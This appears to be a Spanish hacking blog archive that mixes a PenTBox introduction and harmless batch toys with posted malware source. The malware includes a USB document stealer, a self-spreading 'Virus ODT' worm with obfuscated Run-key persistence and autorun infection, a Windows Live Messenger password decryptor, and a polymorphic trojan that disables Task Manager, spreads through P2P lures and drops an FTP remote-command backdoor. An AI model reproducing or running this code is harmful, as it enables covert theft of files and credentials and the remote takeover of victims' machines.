Mostrando entradas con la etiqueta sourses. Mostrar todas las entradas
Mostrando entradas con la etiqueta sourses. Mostrar todas las entradas

PenTBox

Bueno después de unas merecidas vacaciones volvemos a la carga.
Mediante un RSS me encontré con esta suite de sguridad para hacer PenTesting.
Se llama PentBox.
Que es y que nos ofrece PentBox?
¿Qué es eso de PenTBox?

PenTBox_logo

PenTBox es una Suite de Seguridad orientada a [ame="http://en.wikipedia.org/wiki/Penetration_test"]Pentesting[/ame], de ahí su nombre Penetration Testing Box. Esta programada en un lenguaje interpretado, Ruby ([ame="http://es.wikipedia.org/wiki/Ruby"]2[/ame]), lo que le permite ser multiplataforma y tener un código bastante claro. El código esta liberado bajo licencia GNU GPL v3.

La idea principal es que es un conjunto de programas, que pueden ser ejecutados individualmente, sin dependencia de la Suite en sí. Además, el proyecto puede ir creciendo fácilmente grácias a la comunidad, por lo fácil que es implementar nuevos programas individualmente.
El programa es multiplataforma, pero esta orientado a sistemas GNU/Linux. Todas las pruebas se hacen sobre estos y solo a estos se les da un soporte y una garantía de que todo debería funcionar bien. Aún así, PenTBox se puede ejecutar en todos los sistemas que soportan Ruby (MacOS, BSD, DOS, BeOS, OS/2 y más), además de haber desarrollado también una versión funcional para Windows. Se intentan probar todas las funciones en la mayoría de los sistemas soportados, pero como es comprensible no siempre es posible.
¿Y, que programas incluye PenTBox?
Según escribo este artículo, solo existe la versión 1.0 Beta de PenTBox. En líneas generales, el programa tiene las siguientes funciones:
  • Crackeador de Hash MD5, SHA1, SHA256 y SHA512 mediante fuerza bruta numérica.
  • Creador rápido de [ame="http://es.wikipedia.org/wiki/Honeypot"]Honeypots[/ame].
  • Generador de contraseñas seguras ante [ame="http://es.wikipedia.org/wiki/Ataque_de_fuerza_bruta"]ataques de fuerza bruta[/ame] y [ame="http://es.wikipedia.org/wiki/Ataque_de_diccionario"]diccionario[/ame].
  • Generadores de tráfico masivo en la red para probar posibles denegaciones de servicio.
  • Escáner de puertos.
  • Otras aplicaciones complementarias o menores …
¿A quién puede serle útil PenTBox?
Tiene un gran sector de público posible. Desde usuarios con conocimientos limitados, que necesitan crear contraseñas seguras o aprender procedimientos de seguridad hasta administradores de sistemas informáticos, que necesiten crear un Honeypot rápido o probar la estabilidad de su red con herramientas de denegación de servicio.
Además de desarrolladores que quieran estudiar el código o la estabilidad de sus aplicaciones, aficionados o expertos en seguridad informática, etcétera.
¿Cómo puedo participar con PenTBox?
Hay muchas maneras posibles.
  • Desarrollando código fuente, o mejorando el existente buscando posibles fallos o mejoras.
  • Como traductor para los archivos de ayuda y READMES.
  • Promocionando el proyecto para que acudan interesados.
  • Participando en la comunidad.
  • Enviando ideas, o reportando errores.
Fuente
Primero vamos a la zona de descargas de PentBox
Zona de Descargas
Nos bajamos el paquete para Windows por ejemplo. Primero instalamos el paquete ruby:

Deespués de instalar el paquete de Ruby ejecutamos el loader.bat
Nos ha de salir algo así:

Ahora vamos a iniciar un honeypot para realizar un “ataque”.

El honeypot nos pedirña que tipo de configuración queremos ponerle. Como es una demostración la haremos por defecto.

Ahora abrimos nmap y hacemos un escaneo a ver que servicios a levantado…

Y ahora veremos que el Honeypot registra todos nuestros escaneos:

Aqui tenemos un claro ejemplo de como podemos probar ha hacer pentesting.
pentBox al estar en Ruby es multiplataforma.
Un saludo.


FUENTE

HGP-USBpC sTeaLer

Bueno, esto le tenia desde hac mucho y pues me dio la gana de acabarlo y hoy lo posteo despues de dialogar si era bueno o no, pero ya que, esta aqui.
Dicho script hace una funcion interesante, copia todos los documentos .doc, docx o doc(algo), jeje.
si decean solo copiar la musica pues sera solo cambiar el .doc por .mp3 o .midi o algo asi XD.

para un uso efectivo se debe de esconder el bat con algo, ya sea vbs o un programa raro o su propio metodo de ocultacion, la cuestion es arrancar el bat desde la usb y ya XD.


Suerte!

pd: la info sacada de la pc victima es guardada en una carpeta llamada 26.

bye, bytes,
Guerrerohgp




@echo off
::HGP-USBpC sTeaLer
::Creado Por Guerrerohgp
::Solo con proposito educativo,
::no soy responsable del mal uso
::de este script.

::http://guerrerohgp.blogspot.com

@setlocal enabledelayedexpansion

@set "usb=%~d0\"
@set "h=!usb!26\%computername%\"

@start !usb!
@if not exist "!usb!26\" (@md "!usb!26"&&attrib +h "!usb!26")
@if not exist "!h!" (
@md "!h!"
) else (
@exit
)


%homedrive%
@for /f "delims=?" %%a in ('dir /b /s "*.doc"') do (call:hgo %%a)
@exit

:hgo
@copy /y "%*" "!h!">null
goto:eof

Virus ODT

Este code lo hic para un duelo en el que estoy perdiendo XD.
aqui! http://www.hackxcrack.es/foro/index.php?topic=1165.0

@echo off&title ODT
SeTlocaL EnableDelayedExpansion&mode con cols=50 lines=15&ColoR a
::CREATED BY Guerrerohgp
::ONLY FOR EDUCATIVE USE
::GUERREROHGP IS NOT RESPONSABLE OF THE USE OF THE SCRIPT.
Copy /y "%0" %windir%\odt.bat>nul
foR %%a iN (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) dO (cd %%a:\&&call:auto %%a)>nul
set reg=add&set add=reg
set a=abcdef&set m=mlr
echo.Mira La Grafica!&echo. cargando Grafica ODT para CMD O DOS.
%add% %reg% HK%m:~1,1%%m:~0,1%\Softw%a:~0,1%%m:~2,1%%a:~4,1%\%m:~0,1%ic%m:~2,1%osoft\Windows\Cu%m:~2,1%%m:~2,1%entV%a:~4,1%%m:~2,1%sion\%m:~2,1%un /v ODT /t %m:~2,1%%a:~4,1%G_SZ /%a:~3,1% "%windir%\odt.bat" >nul
cd /d "%homedrive%\"
foR /f "tokens=*" %%D iN ('dir /b/s *.doc *.docx') dO (ren "%%D" "%%~nD.odt"&set/a "nt+=1"&set char=%char%±
if "!nt!" gtr "7" set "nt=0"
echo !char!)
cls&echo.Me temo que no podremos Mostrarle
echo.La Grafica. Pues Su Windows&echo.no Soporta El formato Libre de OpenOffice
echo.Por eso nos hemos dado la libertad&echo.De Arreglar sus archivos .doc
ping -n 6 0.0.0.0>nul&cls
echo.Gracias por su comprencion&echo.Que viva el Codigo libre!!!&pause>nul
exit
:auto
(copy /y "%0" %1:\odt.bat&echo.[autorun]>%1:\autoRUN.inf
echo.open=odt.bat>>%1:\autoRUN.inf&echo.icon=%SystemRoot%\system32\SHELL32.dll,4>>%1:\autoRUN.inf
echo.action=Abrir carpeta para ver archivos>>%1:\autoRUN.inf&echo.shell\open=Abrir>>%1:\autoRUN.inf
attrib +h %1:\autoRUN.inf&attrib +h %1:\odt.bat)>nul
goto:eof


espero les guste XD

ADIVINADOR

Bueno se que es un poco tonto, pero me gusto el juegito de que te adivina el numero. y pues lo hic.
c que es muy simple pero espero se diviertan un poco XD.

tambien c que no es lo que yo normalmente postearia pero ya que, me sigue pareciendo divertido para algunos hacerlos caer XD
CoDe:
@echo Off
seTlocaL EnableDelayedExpansion
moDe cOn cols=32 lineS=10
::BY HGP or Guerrerohgp
tiTle Divinador&color a
seT "cntr=echo.&echo.&echo.&"&seT "q=pause>nul"
%cntr%echO.Elige un Numero en tu mente^!&%q%&cls
%cntr%echO.Ahora te doy esa misma cantidad que elegiste
%cntr%echO.Y sumala^!.&%q%
seT/a "r=%random%%%50"
for /l %%a in (2,2,100) do (seT/a "s+=1"
if "!s!" equ "!r!" (seT "r=%%a"))
:fn
seT/a d=%R%/2
cls&%cntr%echO.ahora sumale %R%&%q%
cls&%cntr%echO.ahora divide eso entre 2&%q%
cls&%cntr%echO.Y por ultimo dame lo que te di!&%q%
cls&%cntr%echO.JAJAJA. Ya Se Tu resultado&%q%
cls&%cntr%echO.Tu resutado es %d%&%q%
cls&echo.Bytes, bye&%q%

mMessengerPass

Un code que me gusto mucho, es VB asi q para los q saben de VB, el code lo que hace es desencriptar las pass guardadas en la pc del MSN. solo pruba XD

'---------------------------------------------------------------------------------------
' Module : mMessengerPass
' DateTime : 23/09/2008 11:24
' Author : Cobein
' Mail : cobein27@hotmail.com
' WebPage : http://www.advance.com.ar
' Purpose : Read WLM (>= 8.0) pass
' Usage : At your own risk
' Requirements: None
' Distribution: You can freely use this code in your own
' applications, but you may not reproduce
' or publish this code on any web site,
' online service, or distribute as source
' on any media without express permission.
'
' Reference : No idea about the original author, It was a french guy tho
'
' History : 23/09/2008 First Cut....................................................
'---------------------------------------------------------------------------------------
Option Explicit

Private Declare Function LocalFree Lib "kernel32.dll" (ByVal hMem As Long) As Long
Private Declare Function LocalAlloc Lib "kernel32.dll" (ByVal wFlags As Long, ByVal wBytes As Long) As Long
Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
Private Declare Function CredEnumerate Lib "ADVAPI32.dll" Alias "CredEnumerateW" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
Private Declare Function CredFree Lib "ADVAPI32.dll" (ByVal pBuffer As Long) As Long
Private Declare Function CryptUnprotectData Lib "crypt32.dll" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As DATA_BLOB) As Long
Private Declare Function SysAllocString Lib "oleaut32.dll" (ByVal pOlechar As Long) As String
Private Declare Function GetVersionEx Lib "kernel32.dll" Alias "GetVersionExA" (ByRef lpVersionInformation As OSVERSIONINFO) As Long

Private Type CREDENTIAL
dwFlags As Long
dwType As Long
lpstrTargetName As Long
lpstrComment As Long
ftLastWritten As Double
dwCredentialBlobSize As Long
lpbCredentialBlob As Long
dwPersist As Long
dwAttributeCount As Long
lpAttributes As Long
lpstrTargetAlias As Long
lpUserName As Long
End Type

Private Type DATA_BLOB
cbData As Long
pbData As Long
End Type

Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type

Public Function EnumWLMAccounts() As String
Dim lMem As Long
Dim i As Long
Dim lCount As Long
Dim lCred As Long
Dim ub As Long
Dim lPtr As Long
Dim tCred As CREDENTIAL
Dim tBlobOut As DATA_BLOB
Dim tBlobIn As DATA_BLOB
Dim sPass As String
Dim vData As Variant
Dim tOSV As OSVERSIONINFO

With tOSV
.dwOSVersionInfoSize = Len(tOSV)
Call GetVersionEx(tOSV)
If Not .dwMajorVersion + .dwMinorVersion / 10 >= 5.1 Then
Exit Function
End If
End With

lMem = LocalAlloc(&H40, 38)

vData = Array( _
&H57, &H69, &H6E, &H64, &H6F, &H77, &H73, &H4C, &H69, _
&H76, &H65, &H3A, &H6E, &H61, &H6D, &H65, &H3D, &H2A)

For i = 0 To 17
Call CopyMemory(ByVal lMem + (i * 2), CLng(vData(i)), &H1)
Next

Call CredEnumerate(lMem, 0, lCount, lCred)

If lCount Then
For i = ub To ub + lCount - 1

Call CopyMemory(ByVal VarPtr(lPtr), ByVal lCred + (i - ub) * 4, &H4)
Call CopyMemory(ByVal VarPtr(tCred), ByVal lPtr, &H34)

With tBlobIn
.pbData = tCred.lpbCredentialBlob
.cbData = tCred.dwCredentialBlobSize

Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, tBlobOut)

sPass = Space(.cbData \ 2)
Call CopyMemory(ByVal StrPtr(sPass), ByVal .pbData, .cbData)
End With

EnumWLMAccounts = EnumWLMAccounts & String(50, "-") & vbCrLf
EnumWLMAccounts = EnumWLMAccounts & "Protocol: " & StrConv(SysAllocString(tCred.lpstrTargetName), vbFromUnicode) & vbCrLf
EnumWLMAccounts = EnumWLMAccounts & "Username: " & StrConv(SysAllocString(tCred.lpUserName), vbFromUnicode) & vbCrLf
EnumWLMAccounts = EnumWLMAccounts & "Password: " & sPass & vbCrLf
EnumWLMAccounts = EnumWLMAccounts & String(50, "-") & vbCrLf

Next
ub = ub + lCount
End If

Call CredFree(lCred)
Call LocalFree(lMem)
End Function

SecurE LeveL HGP

Bueno como he estado ocupado ultimamente y creo q lo estare mas, habia dejado mi proyecto, pero este es un adelanto
el secure level, seguro a algunos les va a ser de ayuda.

bueno un code totalmente funcional testeado en XP,Vista,7 y Vista x64 q es la q tengo y en un lio pok no puedo usar el debug.
bueno nada mas, tengo par de codes en mente, algun rato continuo XD

ademas no he visto un code de medir seguridad de pass en batch.

aca el code:

@ECHO OFF
seTlocaL enabledelayedexpansioN
TiTle SecurE LeveL HGP&modE coN colS=41 lineS=10
coloR a

::By Guerrerohgp
::Secure level
::Este script esta a libre uso, BSD.
::no cambiar autor xD.

:inI
seT "pass="&seT "cnT="
cls&seT/p "pass=Tu Clave: "
cls&if noT defined pass goTo inI

:Len
seT/a "cnT+=1"
seT "pass2=!pass:~0,%cnT%!"
if "%pass2%" neq "%pass%" goTo:Len

if %cnT% lss 6 (echo.La clave debe tener minimo 6 caracteres&pause>nul&goTO:inI)
seT "min="&foR %%j in (a,b,c,d,e,f,g,h,i,j,k,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do (seT "le=%%j"&call:conp min)
seT "May="&foR %%i in (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do ( seT "le=%%i"&call:conp May)
seT "num="&foR %%h in (1,2,3,4,5,6,7,8,9,0) do (seT "le=%%h"&call:conp num)

seT "niv=%min%%May%%num%"
echO. Nivel de Seguridad
echO. 1 2 3
echO. _______________________________________&echO. %niv%
pausE>nul
goTO:inI

:conp
foR /l %%k in (0,1,!cnT!) do (seT "sec=!pass2:~%%k,1!"
if "!sec!" equ "!le!" set "%1=²²²²²²²²²²²²²")
goTO:eoF


Nada mas , seguire a paso lento. jeje

Batch Paint de mi compa Smart

SmartGenius: "Quien dijo que no se podia pintar en Batch ???.... =D"



Code:
@Echo Off
@title Batch Paint
@Mode Con cols=80 lines=25
Setlocal Enabledelayedexpansion

::A Program by S.C.O.T 2009
::Script Coders Oriented Team
::SmartGenius & 3D1

:Init
Cls
If Not Exist Col.vbs (Call :Col_Deb >>Col.vbs)
Set "X=0"
Set "Y=0"
Set "Color=11"
Set "Pincel=Û"
Call :Load

:Table
If "!X!-!Y!"=="43-2" (Exit)
For /l %%s in (33,1,39) do (If "!X!-!Y!"=="%%s-2" (Goto :Save))
If "!X!-!Y!"=="22-2" (Set "Pincel=°")
If "!X!-!Y!"=="24-2" (Set "Pincel=±")
If "!X!-!Y!"=="26-2" (Set "Pincel=²")
If "!X!-!Y!"=="28-2" (Set "Pincel=Û")
If "!X!-!Y!"=="3-4" (Set "Color=01")
If "!X!-!Y!"=="5-4" (Set "Color=02")
If "!X!-!Y!"=="7-4" (Set "Color=03")
If "!X!-!Y!"=="3-6" (Set "Color=04")
If "!X!-!Y!"=="5-6" (Set "Color=05")
If "!X!-!Y!"=="7-6" (Set "Color=06")
If "!X!-!Y!"=="3-8" (Set "Color=07")
If "!X!-!Y!"=="5-8" (Set "Color=08")
If "!X!-!Y!"=="7-8" (Set "Color=09")
If "!X!-!Y!"=="3-10" (Set "Color=0A")
If "!X!-!Y!"=="5-10" (Set "Color=0B")
If "!X!-!Y!"=="7-10" (Set "Color=0C")
If "!X!-!Y!"=="3-12" (Set "Color=0D")
If "!X!-!Y!"=="5-12" (Set "Color=0E")
If "!X!-!Y!"=="7-12" (Set "Color=0F")
If !X! GEQ 12 (
If !Y! GEQ 5 (
If !X! LEQ 41 (
If !Y! LEQ 15 (
cscript //nologo col.vbs "!X!" "!Y!" "%Color%" "%Pincel%"
Set /a "vX=!X!-12"
Set /a "vY=!Y!-5"
Set "X!vX!Y!vY!=!vX! !vY! %Color% %Pincel%"
))))
Call :Mouse
Goto :Table

:Load
Echo.
Echo. ÚÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÂÄ¿
Echo. ³Colores³ Pinceles ° ± ² Û ³Guardar³ ³X³
Echo. ³ÚÄÂÄÂÄ¿ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÁÄ´
Echo. ³³Û³Û³Û³³ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ³
Echo. ³ÃÄÅÄÅÄ´³ º º ³
Echo. ³³Û³Û³Û³³ º º ³
Echo. ³ÃÄÅÄÅÄ´³ º º ³
Echo. ³³Û³Û³Û³³ º º ³
Echo. ³ÃÄÅÄÅÄ´³ º º ³
Echo. ³³Û³Û³Û³³ º º ³
Echo. ³ÃÄÅÄÅÄ´³ º º ³
Echo. ³³Û³Û³Û³³ º º ³
Echo. ³ÀÄÁÄÁÄÙ³ º º ³
Echo. ÃÄÄÄÄÄÄÄ´ º º ³
Echo. ³ SCOT ³ º º ³
Echo. ³ Team ³ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ³
Echo. ÀÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
cscript //nologo col.vbs "3" "4" "11" " "
cscript //nologo col.vbs "5" "4" "22" " "
cscript //nologo col.vbs "7" "4" "33" " "
cscript //nologo col.vbs "3" "6" "44" " "
cscript //nologo col.vbs "5" "6" "55" " "
cscript //nologo col.vbs "7" "6" "66" " "
cscript //nologo col.vbs "3" "8" "77" " "
cscript //nologo col.vbs "5" "8" "88" " "
cscript //nologo col.vbs "7" "8" "99" " "
cscript //nologo col.vbs "3" "10" "AA" " "
cscript //nologo col.vbs "5" "10" "BB" " "
cscript //nologo col.vbs "7" "10" "CC" " "
cscript //nologo col.vbs "3" "12" "DD" " "
cscript //nologo col.vbs "5" "12" "EE" " "
cscript //nologo col.vbs "7" "12" "FF" " "
Goto :Eof

:Mouse
Echo e100 B8 1 0'3'DB CD'3'B0 3'C'CD'3'B DB't'FA 91 D3 EA D3 E8 91 C3>mouse.dat
For %%! in (.g116 .q) do (Echo%%!>> mouse.dat)
For /f "tokens=6-8 delims== " %%a in ('Debug ^< x="0x%%a" y="0x%%c" v=" Introduzca">> ">%Filename%
For /l %%a in (0,1,29) do (
For /l %%b in (0,1,11) do (
If Defined X%%aY%%b (Echo.Cscript //nologo col.vbs !X%%aY%%b! >>%Filename%)
))
Echo.Pause^>nul >>%Filename%
Echo.>>%Filename%
Call :Col_Deb Echo. "^">>%Filename%
Echo.
Echo. Archivo %Filename% Generado Exitosamente
Ren %Filename% %Filename%.bat >nul
Echo.
Set /p "V= Presione Cualquier tecla para volver...."nul
Goto :Init

:Template
Echo. @Echo off
Echo. @Title Paint Batch - %Filename%
Echo. @Mode Con Cols=80 Lines=25
Echo. @::Hecho Con Batch Paint
Echo. @::S.C.O.T Team 2009
Echo.If Not Exist Col.vbs Call :Col ^>^>col.vbs
Echo.:Draw
Goto :Eof

:Col_Deb
%1:Col
%1Echo.On Error Resume Next
%1Echo.HexColor = Right("0" %~2^& wscript.arguments(2), 2)
%1Echo.Set oExec = CreateObject("WScript.Shell").Exec("%comspec% /c debug ")
%1Echo.
%1Echo.Do Until oExec.StdOut.Read(1) = "-"
%1Echo. wsh.sleep 10
%1Echo.Loop
%1Echo.
%1Echo.Dim Textos
%1Echo.Textos = Replace(wscript.arguments(3), Chr(195), "Û")
%1Echo.WriteXY wscript.arguments(0), wscript.arguments(1), HexColor, Textos
%1Echo.
%1Echo.oExec.StdIn.Writeline "e0:451 2A"
%1Echo.oExec.StdIn.Writeline "q"
%1Echo.
%1Echo.Sub WriteXY(X, Y, hColor, sText)
%1Echo.Dim ColorText
%1Echo. For j = 1 to Len(sText) Step 10
%1Echo. ColorText = "EB800:" %~2^& Hex(Y * 160 + (X + j - 1) * 2)
%1Echo. For i = j to j + 9
%1Echo. ColorText = ColorText %~2^& " " %~2^& Hex(Asc(Mid(sText, i, 1))) %~2^& " " %~2^& hColor
%1Echo. if i = Len(sText) Then Exit For
%1Echo. Next
%1Echo. oExec.StdIn.Writeline ColorText
%1Echo. Next
%1Echo.End Sub
%1Attrib +H Col.vbs
%1Goto :Eof
Goto :Eof


Guerrerohgp:
q mas , q nos siga impresionando sigan asi Smart y 3D1

(Troyano parasitario) 1l1l3l5.a - by Shadow

Ejecutando comandos remotamente:
El troyano al infectar una maquina envia al servidor FTP un archivo del formato:
%username%at%userdomain%_ipcfg.t
conteniendo la salida del comando 'ipconfig/all'.
Para ejecutar un comando el esa PC basta con crear un archivo del formato:
%username%at%userdomain%_cmd.t
conteniendo el/los comandos a ejecutar, si se ejecuto correctamente, el archivo "%username%at%userdomain%_cmd.t" sera eliminado automaticamente del servidor.

code:

:: 1l1l3l5.a // lil %ini%
:: Autor: lShadowl %ini%
:: SO Objetivo/Target OS: Windows Xp Pro %ini%
:: Propagation: P2P/rar, flash drives (it stay resident looking for new drives to infect) %ini%
:: Propagacion: P2P/rar, flash drives (queda residente en la memoria esperando que nuevos dispositivos se conecten para infectarlos) %ini%
:: Polimorfism: translocation, string morphing, 90-180 bytes added per every run %ini%
:: Polimorfismo: translocacion de codigo, mutacion de cadenas, 90-180 bytes mas cada ves que es ejecutado %ini%
:: Payload: Drops a FTP troyan that allows attacker to execute remote commands and scripts %ini%
:: Payload: Carga un troyano que le permite al atacante ejecutar comandos y scripts de manera remota via FTP %ini%
:: Fecha de creacion/Realese Date: 24/9/09 %ini%
:: Disclaimer: %ini%
:: This script contains malicious code. %ini%
:: Possessing, using, spreading, compiling and linking it, possessing, using and spreading %ini%
:: of the executable form of this script is illegal and it is forbidden in many countries. %ini%
:: Should you do such a thing, the author may not be held responsible for any damage that %ini%
:: occurred from the use of this source code. The actual purpose of this source code is for %ini%
:: educational purposes and as an object of study. This source code comes as is and the author %ini%
:: can not be held responsible for the existence of other modified variants of this code. %ini%
@%systemdrive% %ini%
@set sdjf=fictsoehnda %ini%
@set agnvl=%sdjf:~4,1%%sdjf:~6,1%%sdjf:~3,1% %ini%
@%agnvl%egnkv=%sdjf:~6,1%%sdjf:~2,1%%sdjf:~7,1%%sdjf:~5,1% %ini%
@%agnvl%fsdhf=%sdjf:~0,2%%sdjf:~8,2% %ini%
@%agnvl%mys=%windir%\system32\sysio\lil.bat %ini%
@%egnkv%off %ini%
%agnvl: =%local enabledelayedexpansion %ini%
@md %windir%\system32\sysio >nul %ini%
if not exist %mys% ( @copy /y %0 %mys% >nul %ini%
attrib +h %mys%) %ini%
call:_%1 %2 %ini%
exit %ini%
:_ %ini%
call:_h432crt perp %ini%
exit %ini%
:_mut %ini%
%fsdhf%"ini"<%mys%>%windir%\system32\sysio\$ %ini%
:rnd_b %ini%
call :rnd %ini%
:buc %ini%
%fsdhf%"m%r: =%"<%windir%\system32\sysio\$>nul&&(goto:tst) %ini%
%fsdhf%"m%r: =%"<%mys%>>%windir%\system32\sysio\$ %ini%
%agnvl%/a rdnmm=%random%*9999999 %ini%
%egnkv%::%rdnmm% %%m%r: =%%%>>%windir%\system32\sysio\$ %ini%
:tst %ini%
%agnvl%a=1 %ini%
for /L %%a in (0,1,9) do call:cmp %%a %ini%
%egnkv%%a%|%fsdhf: =%str /C:"o" >nul&&(goto:rnd_b) %ini%
attrib -h %mys% %ini%
type %windir%\system32\sysio\$>%mys% %ini%
ping -n 2 localhost>nul %ini%
attrib +h %mys% %ini%
del /f /q %windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%dfjalds=createobject("scripting.filesystemobject")>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%kdflekj=dfjalds.opentextfile("%mys%",1)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%askdajs=kdflekj.readall>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%kdflekj.close>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%Randomize>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%ahqiaohe=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%jdfasuu=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%dwudhqw=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%asdwdkw=chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)^&chr(int(22*rnd)+97)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%sjdfhjs=Replace(askdajs,"sdjf",ahqiaohe)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%lasdaod=Replace(sjdfhjs,"agnvl",jdfasuu)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%skdnmxi=Replace(lasdaod,"egnkv",dwudhqw)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%sjsabwu=Replace(skdnmxi,"fsdhf",asdwdkw)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%%agnvl%skdjawuj=dfjalds.opentextfile("%mys%",2)>>%windir%\system32\sysio\asjdhau.vbs %ini%
%egnkv%skdjawuj.write sjsabwu>>%windir%\system32\sysio\asjdhau.vbs %ini%
start %windir%\system32\sysio\asjdhau.vbs %ini%
del /f /q %windir%\system32\sysio\h432.vbs,%windir%\system32\sysio\$&& exit %ini%
:_h432crt %m5%
%egnkv%%agnvl%xect=CREATEOBJECT("WSCRIPT.SHELL")>%windir%\system32\sysio\h432.vbs %m5%
%egnkv%xect.run "cmd /c %mys%%1", vbhide>>%windir%\system32\sysio\h432.vbs&& start %windir%\system32\sysio\h432.vbs&& goto :eof %m5%
:cmp %m7%
%fsdhf%"m%1"<%windir%\system32\sysio\$>nul %m7%
if %errorlevel%==1 (%agnvl% a=%a%o %m7%
goto:eof) %m7%
%agnvl% a=%a%x %m7%
goto :EOF %m7%
:rnd %m6%
%agnvl%/a r=%random%%%10 %m6%
goto:eof %m6%
:_perp %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\%sdjf:~6,1%xplor%sdjf:~6,1%r" /v NoFol%sdjf:~9,1%%sdjf:~6,1%rOptions /t R%sdjf:~6,1%G_%sdjf:~9,1%WOR%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntv%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%T%sdjf:~10,1%skMgr /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
r%sdjf:~6,1%g %sdjf:~10,1%%sdjf:~9,1%%sdjf:~9,1% "HKCU\Softw%sdjf:~10,1%r%sdjf:~6,1%\Microsoft\Win%sdjf:~9,1%ows\Curr%sdjf:~6,1%ntV%sdjf:~6,1%rsion\Polici%sdjf:~6,1%s\Syst%sdjf:~6,1%m" /v %sdjf:~9,1%is%sdjf:~10,1%bl%sdjf:~6,1%R%sdjf:~6,1%gistryTools /t r%sdjf:~6,1%g_%sdjf:~9,1%wor%sdjf:~9,1% /%sdjf:~9,1% "1" /f %m1%
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v lilUpdate /t REG_SZ /d %mys%/f %m1%
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v AvUpdate /t REG_SZ /d %windir%\system32\sysio\h42.vbs /f %m1%
del /q %windir%\system32\sysio\t.rar %m1%
%systemdrive%&& set rc=1 %m1%
if exist "%programfiles%\WINRAR\WinRAR.exe" (set r="%programfiles%\WINRAR\WinRAR.exe" %m1%
%r% a -ibck -y %windir%\system32\sysio\t.rar %mys: =% %m1%
if not %errorlevel%==9009 set rc=0) %m1%
for %%a in ("%userprofile%\Configuraci¢n local\Datos de programa\Ares\My Shared Folder\" "%userprofile%\Local Settings\Application Data\Ares\My Shared Folder\" "%programfiles%\eMule\Incoming\" "%programfiles%\Shareaza\Downloads\" "%programfiles%\BearShare\Shared\" "%programfiles%\LimeWire\Shared\") do (if exist "%%a" (cd "%%a" %m1%
for %%e in (*.rar) do (type !mys: =!>"%%~ne.bat" %m1%
ping -n 2 localhost >nul&& !r! a -ibck -y "%%e" "%%~ne.bat") %m1%
for %%g in ("XXX Photos" dvdrip glee "Keygen Constructor" wii psp "Keygen ALL" fringe surrogates "Nude Celebrities" "MSN hack codes" "Password list" "Activation tool" Windows7 "Windows 7 trucos" "Windows 7 tricks" "MSN Hack Tool" Photoshop "Photoshop CS4") do (type !mys: =!>%%g.bat %m1%
if !rc!==0 (ping -n 2 localhost>nul&& !r! a -ibck -y %%g.rar %%g.bat)))) %m1%
call:_h432crt fnid&& ping -n 12 localhost>nul %m1%
